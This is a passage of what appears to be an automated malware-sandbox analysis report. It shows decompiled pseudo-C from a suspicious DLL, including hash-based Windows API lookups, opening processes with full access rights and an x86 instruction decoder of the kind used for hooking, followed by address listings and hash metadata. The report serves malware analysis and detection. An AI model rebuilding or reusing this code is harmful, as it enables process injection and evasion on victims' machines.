						E1000F678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E1001223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E1000F678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E1000F5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E1000F5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E1000F4E0(_t449 + 0x14, 0);
									_t180 = E10012928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E1000F4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E1000F4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E1000C2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 4);
											 *(E1000F4E0(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E1000CD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E1000F4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E1000F4E0(_t449 + 0x40, _t431 * 4);
												E10008B9C( *_t211, E100102D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E1000F4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E1000F4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E1000F4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E1000F4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E1000F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E100138C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E1000F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E1000F4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E1000F4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E1000F4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E1000F4E0(_t322, _t430);
										E100138C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E1000F4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t322, E1000F4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
								 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E1000F84C(_t322, E1000F4F0(_t322) + 4);
								 *(E1000F4E0(_t322, E1000F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E1000F4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
										 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E1000F84C( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E1000F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E1000F4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E1000F4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E1000F4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E1000F4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E1000F4E0(_t430, _t443);
										E100138C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E1000F4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t430, E1000F4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E1000F4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E1000F4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E1000F4E0( *(_t449 + 4), _t445);
										E100138C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E1000F4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E1000F4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}























































                                                                                                        0x10008479
                                                                                                        0x1000847f
                                                                                                        0x10008483
                                                                                                        0x10008487
                                                                                                        0x10008492
                                                                                                        0x10008496
                                                                                                        0x1000849b
                                                                                                        0x100084a3
                                                                                                        0x100084b3
                                                                                                        0x00000000
                                                                                                        0x100084b5
                                                                                                        0x100084bd
                                                                                                        0x100084c4
                                                                                                        0x100084c4
                                                                                                        0x10008a17
                                                                                                        0x10008a19
                                                                                                        0x10008a5a
                                                                                                        0x10008a5c
                                                                                                        0x10008a6b
                                                                                                        0x10008a77
                                                                                                        0x10008a77
                                                                                                        0x10008a66
                                                                                                        0x10008a7d
                                                                                                        0x10008a82
                                                                                                        0x00000000
                                                                                                        0x10008a82
                                                                                                        0x10008a6a
                                                                                                        0x00000000
                                                                                                        0x100084ce
                                                                                                        0x100084d2
                                                                                                        0x100084d5
                                                                                                        0x100085dd
                                                                                                        0x100085dd
                                                                                                        0x100085e2
                                                                                                        0x10008705
                                                                                                        0x10008709
                                                                                                        0x1000870e
                                                                                                        0x10008712
                                                                                                        0x10008716
                                                                                                        0x1000884c
                                                                                                        0x1000884e
                                                                                                        0x10008852
                                                                                                        0x1000885b
                                                                                                        0x10008866
                                                                                                        0x1000886a
                                                                                                        0x10008873
                                                                                                        0x10008878
                                                                                                        0x1000887e
                                                                                                        0x1000887f
                                                                                                        0x10008883
                                                                                                        0x10008887
                                                                                                        0x1000888e
                                                                                                        0x10008890
                                                                                                        0x100089d0
                                                                                                        0x100089e1
                                                                                                        0x100089e8
                                                                                                        0x100089ef
                                                                                                        0x100089ef
                                                                                                        0x100089f2
                                                                                                        0x100089f5
                                                                                                        0x100089f8
                                                                                                        0x100089fe
                                                                                                        0x10008a05
                                                                                                        0x10008a09
                                                                                                        0x10008a12
                                                                                                        0x00000000
                                                                                                        0x10008a12
                                                                                                        0x10008a00
                                                                                                        0x10008a03
                                                                                                        0x10008a1c
                                                                                                        0x10008a34
                                                                                                        0x10008a37
                                                                                                        0x10008a3c
                                                                                                        0x10008a46
                                                                                                        0x10008a49
                                                                                                        0x10008a4c
                                                                                                        0x10008a55
                                                                                                        0x00000000
                                                                                                        0x10008a55
                                                                                                        0x00000000
                                                                                                        0x10008a03
                                                                                                        0x10008898
                                                                                                        0x10008898
                                                                                                        0x1000889a
                                                                                                        0x1000889e
                                                                                                        0x100088a3
                                                                                                        0x100088a5
                                                                                                        0x100088a9
                                                                                                        0x100088ac
                                                                                                        0x100088b4
                                                                                                        0x100088b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100088cd
                                                                                                        0x100088e8
                                                                                                        0x100088ea
                                                                                                        0x100088f8
                                                                                                        0x100088fd
                                                                                                        0x100088ff
                                                                                                        0x1000891c
                                                                                                        0x1000891c
                                                                                                        0x10008920
                                                                                                        0x10008922
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008924
                                                                                                        0x10008927
                                                                                                        0x10008948
                                                                                                        0x10008967
                                                                                                        0x1000896d
                                                                                                        0x10008970
                                                                                                        0x10008975
                                                                                                        0x10008976
                                                                                                        0x1000897d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008985
                                                                                                        0x10008985
                                                                                                        0x10008987
                                                                                                        0x10008993
                                                                                                        0x1000899f
                                                                                                        0x100089c1
                                                                                                        0x100089c6
                                                                                                        0x100089c7
                                                                                                        0x100089c7
                                                                                                        0x00000000
                                                                                                        0x10008987
                                                                                                        0x00000000
                                                                                                        0x10008927
                                                                                                        0x10008901
                                                                                                        0x10008907
                                                                                                        0x10008909
                                                                                                        0x1000890a
                                                                                                        0x1000890b
                                                                                                        0x1000890c
                                                                                                        0x10008910
                                                                                                        0x10008914
                                                                                                        0x10008916
                                                                                                        0x10008917
                                                                                                        0x10008918
                                                                                                        0x1000891a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000891a
                                                                                                        0x1000892d
                                                                                                        0x00000000
                                                                                                        0x1000892d
                                                                                                        0x1000871c
                                                                                                        0x1000871e
                                                                                                        0x10008720
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000872a
                                                                                                        0x1000872a
                                                                                                        0x1000872c
                                                                                                        0x1000872f
                                                                                                        0x10008731
                                                                                                        0x10008739
                                                                                                        0x10008740
                                                                                                        0x10008744
                                                                                                        0x10008747
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008843
                                                                                                        0x10008844
                                                                                                        0x10008846
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008846
                                                                                                        0x1000874d
                                                                                                        0x10008750
                                                                                                        0x10008759
                                                                                                        0x1000875e
                                                                                                        0x10008760
                                                                                                        0x1000876c
                                                                                                        0x10008770
                                                                                                        0x10008775
                                                                                                        0x10008779
                                                                                                        0x10008b56
                                                                                                        0x10008b6a
                                                                                                        0x10008b8c
                                                                                                        0x10008b91
                                                                                                        0x10008b91
                                                                                                        0x1000878f
                                                                                                        0x10008794
                                                                                                        0x10008798
                                                                                                        0x10008798
                                                                                                        0x10008798
                                                                                                        0x10008798
                                                                                                        0x1000879d
                                                                                                        0x100087a2
                                                                                                        0x100087a4
                                                                                                        0x100087a8
                                                                                                        0x100087af
                                                                                                        0x100087b4
                                                                                                        0x100087b6
                                                                                                        0x10008b17
                                                                                                        0x10008b26
                                                                                                        0x10008b3f
                                                                                                        0x10008b44
                                                                                                        0x10008b44
                                                                                                        0x100087c9
                                                                                                        0x100087ce
                                                                                                        0x100087d2
                                                                                                        0x100087d2
                                                                                                        0x100087d2
                                                                                                        0x100087e4
                                                                                                        0x10008805
                                                                                                        0x1000880d
                                                                                                        0x1000881b
                                                                                                        0x10008839
                                                                                                        0x1000883f
                                                                                                        0x1000883f
                                                                                                        0x00000000
                                                                                                        0x10008750
                                                                                                        0x100085e8
                                                                                                        0x100085e8
                                                                                                        0x100085ea
                                                                                                        0x100085f1
                                                                                                        0x100085ff
                                                                                                        0x10008601
                                                                                                        0x10008605
                                                                                                        0x10008607
                                                                                                        0x10008609
                                                                                                        0x10008644
                                                                                                        0x10008653
                                                                                                        0x10008655
                                                                                                        0x10008657
                                                                                                        0x10008675
                                                                                                        0x10008677
                                                                                                        0x10008679
                                                                                                        0x1000868b
                                                                                                        0x100086a9
                                                                                                        0x100086b2
                                                                                                        0x100086b5
                                                                                                        0x100086c3
                                                                                                        0x100086d4
                                                                                                        0x100086f2
                                                                                                        0x100086f4
                                                                                                        0x100086f8
                                                                                                        0x100086f8
                                                                                                        0x100086f8
                                                                                                        0x10008679
                                                                                                        0x00000000
                                                                                                        0x10008657
                                                                                                        0x1000860f
                                                                                                        0x1000860f
                                                                                                        0x10008614
                                                                                                        0x1000861b
                                                                                                        0x1000862a
                                                                                                        0x10008631
                                                                                                        0x10008633
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000863f
                                                                                                        0x10008640
                                                                                                        0x10008642
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008642
                                                                                                        0x10008635
                                                                                                        0x10008638
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100086fa
                                                                                                        0x100086fa
                                                                                                        0x100086fb
                                                                                                        0x100086fb
                                                                                                        0x00000000
                                                                                                        0x100084db
                                                                                                        0x100084db
                                                                                                        0x100084db
                                                                                                        0x100084dd
                                                                                                        0x100084e4
                                                                                                        0x100084f2
                                                                                                        0x100084f4
                                                                                                        0x100084f8
                                                                                                        0x100084fa
                                                                                                        0x10008526
                                                                                                        0x1000852a
                                                                                                        0x1000852f
                                                                                                        0x10008534
                                                                                                        0x10008538
                                                                                                        0x1000853c
                                                                                                        0x10008543
                                                                                                        0x10008548
                                                                                                        0x1000854a
                                                                                                        0x10008ad9
                                                                                                        0x10008ae8
                                                                                                        0x10008b07
                                                                                                        0x10008b0c
                                                                                                        0x10008b0c
                                                                                                        0x1000855d
                                                                                                        0x10008562
                                                                                                        0x10008566
                                                                                                        0x10008566
                                                                                                        0x10008566
                                                                                                        0x10008577
                                                                                                        0x10008579
                                                                                                        0x1000857b
                                                                                                        0x1000858c
                                                                                                        0x1000858c
                                                                                                        0x10008591
                                                                                                        0x10008596
                                                                                                        0x1000859a
                                                                                                        0x1000859f
                                                                                                        0x100085a6
                                                                                                        0x100085ab
                                                                                                        0x100085ad
                                                                                                        0x10008a9b
                                                                                                        0x10008aa7
                                                                                                        0x10008ac1
                                                                                                        0x10008ac6
                                                                                                        0x10008ac6
                                                                                                        0x100085c3
                                                                                                        0x100085c8
                                                                                                        0x100085cc
                                                                                                        0x100085cc
                                                                                                        0x100085cc
                                                                                                        0x100085cc
                                                                                                        0x100085cf
                                                                                                        0x100085cf
                                                                                                        0x00000000
                                                                                                        0x100085cf
                                                                                                        0x100084fe
                                                                                                        0x100084fe
                                                                                                        0x10008500
                                                                                                        0x1000850c
                                                                                                        0x10008513
                                                                                                        0x10008515
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008521
                                                                                                        0x10008522
                                                                                                        0x10008524
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10008524
                                                                                                        0x10008517
                                                                                                        0x1000851a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100085d0
                                                                                                        0x100085d4
                                                                                                        0x100085d5
                                                                                                        0x100085d5
                                                                                                        0x00000000
                                                                                                        0x100084dd
                                                                                                        0x100084d5

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: e5d2a05c997b5056918904a7564b335668fb5dad0c144e9a8d9b79fdba869408
                                                                                                        • Instruction ID: 1bb0d61435caef0e58cc5acfc0dead8aa63cbeb4aacce1040875febecc2d3119
                                                                                                        • Opcode Fuzzy Hash: e5d2a05c997b5056918904a7564b335668fb5dad0c144e9a8d9b79fdba869408
                                                                                                        • Instruction Fuzzy Hash: 76126C752083049FE714DF24C981A6FB7E5FF85784F10892DF999872AAEB30AD04DB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10019348, Relevance: 1.8, Strings: 1, Instructions: 529COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10019348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E10013670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
